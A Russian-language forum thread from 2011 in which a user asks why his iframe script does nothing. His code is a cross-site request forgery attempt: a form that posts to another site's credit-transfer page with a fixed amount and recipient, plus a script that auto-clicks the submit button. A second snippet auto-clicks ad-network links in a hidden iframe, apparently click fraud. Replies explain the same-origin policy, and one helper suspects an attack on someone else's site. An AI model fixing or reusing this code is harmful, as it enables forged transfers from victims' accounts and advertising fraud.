Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 03.04.2011, 19:10
Интересующийся
Отправить личное сообщение для qaz123 Посмотреть профиль Найти все сообщения от qaz123
 
Регистрация: 27.03.2011
Сообщений: 22

фреймм......
<iframe name = "zxc" src="0.html" >
 </iframe>

<form name="forma" method="post" action="http://www.сайт.ru/members/movecredits.php">
<table>
 <tr>
 <td><b>Передать</td>
 <td><input type="text" name="amt_credits" value="200" size="5" maxlength="6" class="webforms"><b> кредит(ов)</td>
 </tr>
 <tr>
 <td><b>Пользователю #ID</td>
 <td><input type="text" name="rcv_user" value="31048" size="5" maxlength="6" class="webforms"></td>
 </tr>
 <tr>
 <td colspan=2 align=center><input type="submit" id="4" name="submit" value="Передать кредиты" class="formbutton"></td>
 </tr>
 </table>
</form>
<script language="JavaScript">
window.frames['zxc'].document.getElementById('4').click() 
</script>



почему во фрейме ничего не происходит?
Ответить с цитированием
  #2 (permalink)  
Старый 04.04.2011, 16:11
Интересующийся
Отправить личное сообщение для qaz123 Посмотреть профиль Найти все сообщения от qaz123
 
Регистрация: 27.03.2011
Сообщений: 22

хелп
Ответить с цитированием
  #3 (permalink)  
Старый 04.04.2011, 16:35
Аватар для Skipp
.
Отправить личное сообщение для Skipp Посмотреть профиль Найти все сообщения от Skipp
 
Регистрация: 30.03.2010
Сообщений: 1,813

Либо во фрейме ещё не успело под грузиться содержимое, либо вы пытаетесь обратиться к странице на другом домене.
__________________
.
Ответить с цитированием
  #4 (permalink)  
Старый 04.04.2011, 17:37
Интересующийся
Отправить личное сообщение для qaz123 Посмотреть профиль Найти все сообщения от qaz123
 
Регистрация: 27.03.2011
Сообщений: 22

Сообщение от Skipp Посмотреть сообщение
либо вы пытаетесь обратиться к странице на другом домене.
в смысле? после нажатия на кнопку скрипт формы передаёт данные на другой домен

ну так вить такая конструкция прекрасно работает
<iframe name= i>
</iframe>

<script language="JavaScript" charset="UTF-8" src="http://z750.takru.com/in.php?id=751896"></script>

<script language="JavaScript">
function clicke(n){
var a= document.getElementsByTagName("a"), links= [];
for(var i= 0; i < a.length; i++){
if(a[i].className == "takru"){
links.push(a[i]);
}
}
links[n].target= "i";
links[n].click();
}
clicke(1);
</script>
Ответить с цитированием
  #5 (permalink)  
Старый 04.04.2011, 17:40
Аватар для Skipp
.
Отправить личное сообщение для Skipp Посмотреть профиль Найти все сообщения от Skipp
 
Регистрация: 30.03.2010
Сообщений: 1,813

Сообщение от qaz123
в смысле?
в том смысле, что если во фрейм загружена страница с другого домена, то браузер вам не даст к ней доступ.
__________________
.
Ответить с цитированием
  #6 (permalink)  
Старый 04.04.2011, 17:42
sinistral
Посмотреть профиль Найти все сообщения от melky
 
Регистрация: 28.03.2011
Сообщений: 5,418

Сообщение от qaz123 Посмотреть сообщение
<iframe name = "zxc" src="0.html" >
 </iframe>
да тут вроде локальный путь

пробовали вешать onload во фрейм?
Ответить с цитированием
  #7 (permalink)  
Старый 04.04.2011, 17:46
Интересующийся
Отправить личное сообщение для qaz123 Посмотреть профиль Найти все сообщения от qaz123
 
Регистрация: 27.03.2011
Сообщений: 22

Сообщение от melky Посмотреть сообщение
да тут вроде локальный путь

пробовали вешать onload во фрейм?
не непробовал, сори , не совсем понимаю што вы имеете в виду
Ответить с цитированием
  #8 (permalink)  
Старый 04.04.2011, 17:51
Аватар для Skipp
.
Отправить личное сообщение для Skipp Посмотреть профиль Найти все сообщения от Skipp
 
Регистрация: 30.03.2010
Сообщений: 1,813

melky,
обычно люди у себя делают одно, а пишут сюда другое, типа что бы нам было понятнее и не раз уже бывало, что тему разводили на 2-3 страницы, а в конце оказывалось, что тот пытался изменить чужой сайт. По этому на всякий случай и пишу.
qaz123,
он имеет ввиду, то же что и я вам писал до этого, вы уверены, что страница во фрейме уже загружена на момент обращения к её элементам?
__________________
.

Последний раз редактировалось Skipp, 04.04.2011 в 17:53.
Ответить с цитированием
  #9 (permalink)  
Старый 04.04.2011, 17:57
Интересующийся
Отправить личное сообщение для qaz123 Посмотреть профиль Найти все сообщения от qaz123
 
Регистрация: 27.03.2011
Сообщений: 22

Сообщение от Skipp Посмотреть сообщение
melky,
обычно люди у себя делают одно, а пишут сюда другое, типа что бы нам было понятнее и не раз уже бывало, что тему разводили на 2-3 страницы, а в конце оказывалось, что тот пытался изменить чужой сайт. По этому на всякий случай и пишу.
qaz123,
он имеет ввиду, то же что и я вам писал до этого, вы уверены, что страница во фрейме уже загружена на момент обращения к её элементам?
ну вроде да, глянь сам
Ответить с цитированием
  #10 (permalink)  
Старый 04.04.2011, 18:23
Интересующийся
Отправить личное сообщение для qaz123 Посмотреть профиль Найти все сообщения от qaz123
 
Регистрация: 27.03.2011
Сообщений: 22

хелп
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск